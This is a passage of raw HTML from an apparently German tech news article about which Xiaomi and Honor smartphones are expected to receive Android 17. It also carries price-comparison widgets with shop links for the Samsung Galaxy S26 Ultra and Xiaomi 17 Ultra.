data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=4l-tfKOmtMCXVSmyu4TSBPEx-hPUMUXSEdvBN14MfQK5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dhlaFBJ0XOrvWrxaujk9KwO1U_NuDl7e7PN2szI6ujqvdsZLYOSPHISb_FqQXJxsbTJZvBxqRh5M&amp;mid=686061937859&amp;id=686061937859&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.159,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.159,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-prime-logo.svg" alt="Amazon Prime" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.179,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="prime" data-vars-product-price="1.179,00 €" data-vars-product-vendor="Amazon Prime" aria-label="Deal anschauen bei Amazon Prime für 1.179,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.199,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="1.199,99 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.199,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/10729.png" alt="expert TechnoMarkt" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.379,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uyGu_6XD6dktiDOfdN0LnJe3tbSWKwr5Q-83Kv8zhzSEbEokfk-c7D__ecxGdSDN7oFn43uV-nFaEmlykUvpU5LdOrEl8NlozMdBY5bCkNVIsjqVD5uBARxBMizrH_m_OhOmf5U6z-u&amp;mid=686110970286&amp;id=686110970286&amp;ts=20260622&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uyGu_6XD6dktiDOfdN0LnJe3tbSWKwr5Q-83Kv8zhzSEbEokfk-c7D__ecxGdSDN7oFn43uV-nFaEmlykUvpU5LdOrEl8NlozMdBY5bCkNVIsjqVD5uBARxBMizrH_m_OhOmf5U6z-u&amp;mid=686110970286&amp;id=686110970286&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.379,00 €" data-vars-product-vendor="expert TechnoMarkt" aria-label="Deal anschauen bei expert TechnoMarkt für 1.379,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/9553666945" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/9553666945" data-vendor-api="shopping24" data-vars-product-price="1.429,99 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260622&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.429,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/samsung-logo.svg" alt="Samsung" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.449,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-price="1.449,00 €" data-vars-product-vendor="Samsung" aria-label="Deal anschauen bei Samsung für 1.449,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Xiaomi</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f005de0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/PXL_20260310_145909935.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Xiaomi 17 kameror" class="wp-image-3086446" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Xiaomi ist nicht immer eindeutig mit den eigenen Update-Versprechen. Es gibt aber noch viele aktuelle Geräte, die Teil des Update-Zyklus sein dürften.</p>



<p>Xiaomi liefert Android 17 daher voraussichtlich an folgende Geräte aus:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3078239/xiaomi-17-test.html" target="_blank" rel="noreferrer noopener">17</a> / Pro / Pro Max / <a href="https://www.pcwelt.de/article/3131894/xiaomi-17-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2635137/xiaomi-15-test.html" target="_blank" rel="noreferrer noopener">15</a> / <a href="https://www.pcwelt.de/article/2641294/xiaomi-15-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / Pro</li>



<li><a href="https://www.pcwelt.de/article/2924488/xiaomi-15t-test.html" target="_blank" rel="noreferrer noopener">15 T</a> / <a href="https://www.pcwelt.de/article/2924662/xiaomi-15t-pro-test-2.html" target="_blank" rel="noreferrer noopener">15 T Pro</a></li>



<li>15S Pro</li>



<li><a href="https://www.pcwelt.de/article/2250161/xiaomi-14-hands-on.html" target="_blank" rel="noreferrer noopener">14</a> / <a href="https://www.pcwelt.de/article/2313696/das-xiaomi-14-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / <a href="https://www.pcwelt.de/article/2489914/test-xiaomi-14t-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>14 T / 14 T Pro</li>



<li>13T /<a href="https://www.pcwelt.de/article/2086566/xiaomi-13t-pro-test.html" target="_blank" rel="noreferrer noopener"> Pro</a></li>



<li><a href="https://www.pcwelt.de/article/3060842/xiaomi-redmi-note-15-5g-test.html" target="_blank" rel="noreferrer noopener">Redmi Note 15</a> / <a href="https://www.pcwelt.de/article/3029932/xiaomi-redmi-note-15-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3044182/xiaomi-redmi-note-15-pro-plus-5g-test.html" target="_blank" rel="noreferrer noopener">Pro+</a></li>



<li>Redmi Note 14 / Pro / Pro+</li>



<li>Poco X8 / Pro / <a href="https://www.pcwelt.de/article/3105908/tpoco-x8-pro-max-test.html" target="_blank" rel="noreferrer noopener">Pro Max</a></li>



<li>Poco F8 / <a href="https://www.pcwelt.de/article/3012838/poco-f8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3012817/xiaomi-poco-f8-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li>Poco M8 / <a href="https://www.pcwelt.de/article/3072287/poco-m8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco X7 / <a href="https://www.pcwelt.de/article/2573751/xiaomi-poco-x7-pro-amazon-angebot-early-bird-rabatt.html" target="_blank" rel="noreferrer noopener">Pro</a> </li>



<li><a href="https://www.pcwelt.de/article/2828306/xiaomi-poco-f7-test.html" target="_blank" rel="noreferrer noopener">Poco F7</a> / <a href="https://www.pcwelt.de/article/2653239/poco-f7-pro-martphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco F6 / <a href="https://www.pcwelt.de/article/2356099/das-poco-f6-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco M7 / Pro</li>



<li>Mix Fold 4</li>



<li>Mix Flip </li>
</ul>



<p><strong>Voraussichtlich kein Android-Update mehr:</strong> Xiaomi 13 Lite, 13 Pro, Redmi K60 Ultra, Redmi K70 Ultra, Redmi Turbo 3, Poco X6, X6 Pro, X6 5G, Poco M6 Plus, Mix Fold 3.</p>



<p><strong>Xiaomi 17 Ultra im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.189,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=e6Z83DiuG2XgFdiMIpCMzPcSuEO_gveORq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M2Kj4qrzm9aTRQhe5t4cwIC8NWSccOLGh1ennJFMKED9sM8E9IH9LWP169nq5fkCQoCJKtTlI8B-&amp;mid=686101017582&amp;id=686101017582&amp;ts=20260622&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=e6Z83DiuG2XgFdiMIpCMzPcSuEO_gveORq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M2Kj4qrzm9aTRQhe5t4cwIC8NWSccOLGh1ennJFMKED9sM8E9IH9LWP169nq5fkCQoCJKtTlI8B-&amp;mid=686101017582&amp;id=686101017582&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.189,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 1.189,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.189,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=kt1XCJM1FqeRDMrEUYsO-lVt6WZAp33caFQNuxad7411g7_hVoNHUlypbjqnDWPQIkZKpwcYI7d7CHt1qlFu5LyNrnCfAv08CvI4ur_8-1Rxg34j7QDYZF7ZJFUfe4jgUyWbwcakYeT&amp;mid=686106064556&amp;id=686106064556&amp;ts=20260622&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=kt1XCJM1FqeRDMrEUYsO-lVt6WZAp33caFQNuxad7411g7_hVoNHUlypbjqnDWPQIkZKpwcYI7d7CHt1qlFu5LyNrnCfAv08CvI4ur_8-1Rxg34j7QDYZF7ZJFUfe4jgUyWbwcakYeT&amp;mid=686106064556&amp;id=686106064556&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.189,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 1.189,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/9999.png" alt="Amazon Marketplace CE" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.246,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aUr2h88O-ZVgFdiMIpCMzOm2o9VxuzgTVdJ2CJUU4vKWAgE2o8Zl9Lbuc_gm3yF6igrPtbg61YQAOSdlbk_iFsIwM9sg9Tk1H7f2UgQlR_XAtko0dkSSUyIYAvavBRl1RjFOVFXHH32&amp;mid=686321214724&amp;id=686321214724&amp;ts=20260622&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aUr2h88O-ZVgFdiMIpCMzOm2o9VxuzgTVdJ2CJUU4vKWAgE2o8Zl9Lbuc_gm3yF6igrPtbg61YQAOSdlbk_iFsIwM9sg9Tk1H7f2UgQlR_XAtko0dkSSUyIYAvavBRl1RjFOVFXHH32&amp;mid=686321214724&amp;id=686321214724&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.246,90 €" data-vars-product-vendor="Amazon Marketplace CE" aria-label="Deal anschauen bei Amazon Marketplace CE für 1.246,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.392,85 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=JHfoYfceOk9vsU1Wdh-mdc5Hd99OQeF7TGlRE1PieSi63YeDFtoR-orhTgXH2lveUzBBhPJp6i_Vyf_7bZiqRX691PQF-8JW9rmuz2eBcqG4IEGjtyRLZ7cGkluzcYlVenRmPhh8kBN&amp;mid=686413403941&amp;id=686413403941&amp;ts=20260622&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=JHfoYfceOk9vsU1Wdh-mdc5Hd99OQeF7TGlRE1PieSi63YeDFtoR-orhTgXH2lveUzBBhPJp6i_Vyf_7bZiqRX691PQF-8JW9rmuz2eBcqG4IEGjtyRLZ7cGkluzcYlVenRmPhh8kBN&amp;mid=686413403941&amp;id=686413403941&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.392,85 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.392,85 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=O14GZp9jgFjtiDOfdN0LnJe3tbSWKwr5StjRvcvK9gAEbEokfk-c7Dg2RH8nVS-07oFn43uV-nFhHtU87wR-8ZA7FvRP3EFqjzdrMyOro6riGAL2rwUZdU6UbQhTdBmv0yWbwcakYeT&amp;mid=686069531716&amp;id=686069531716&amp;ts=20260622&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=O14GZp9jgFjtiDOfdN0LnJe3tbSWKwr5StjRvcvK9gAEbEokfk-c7Dg2RH8nVS-07oFn43uV-nFhHtU87wR-8ZA7FvRP3EFqjzdrMyOro6riGAL2rwUZdU6UbQhTdBmv0yWbwcakYeT&amp;mid=686069531716&amp;id=686069531716&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.499,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.499,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=g58RkILoWKjgFdiMIpCMzOvm45kg1DyzFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_CgrPtbg61YQAOSdlbk_iFtFCF7m3hzAgLw1ZJxw4saHV6eckUwoQP1IKRqKMIF-sICJKtTlI8B-&amp;mid=686389858219&amp;id=686389858219&amp;ts=20260622&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=g58RkILoWKjgFdiMIpCMzOvm45kg1DyzFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_CgrPtbg61YQAOSdlbk_iFtFCF7m3hzAgLw1ZJxw4saHV6eckUwoQP1IKRqKMIF-sICJKtTlI8B-&amp;mid=686389858219&amp;id=686389858219&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.499,90 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.499,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/xiaomi-logo.svg" alt="Xiaomi" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.mi.com/de/product/xiaomi-17-ultra/buy/" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.mi.com/de/product/xiaomi-17-ultra/buy/" data-vars-product-price="1.499,90 €" data-vars-product-vendor="Xiaomi" aria-label="Deal anschauen bei Xiaomi für 1.499,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Honor</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2f01208f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/IMG_9620.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Honor Magic V6" class="wp-image-3077615" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Hall / Foundry</p></div>



<p>Honor ist ebenfalls einer der Hersteller, die länger Android-Updates an ihre Geräte ausliefern. Bis zu sieben Jahre ist der Update-Zyklus hier, was aber vor allem für Flaggschiff-Modelle gilt.</p>



<p>Diese Honor-Smartphones bekommen wahrscheinlich das Update auf Android 17:</p>



<p><strong>Sollten auch Android 17 bekommen:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3143704/honor-600-test.html" target="_blank" rel="noreferrer noopener">600</a> / Pro</li>



<li>Magic 8 / <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3011397/honor-magic-8-lite-test.html" target="_blank" rel="noreferrer noopener">Lite</a></li>



<li>Magic V6</li>



<li><a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank" rel="noreferrer noopener">Magic V5</a></li>



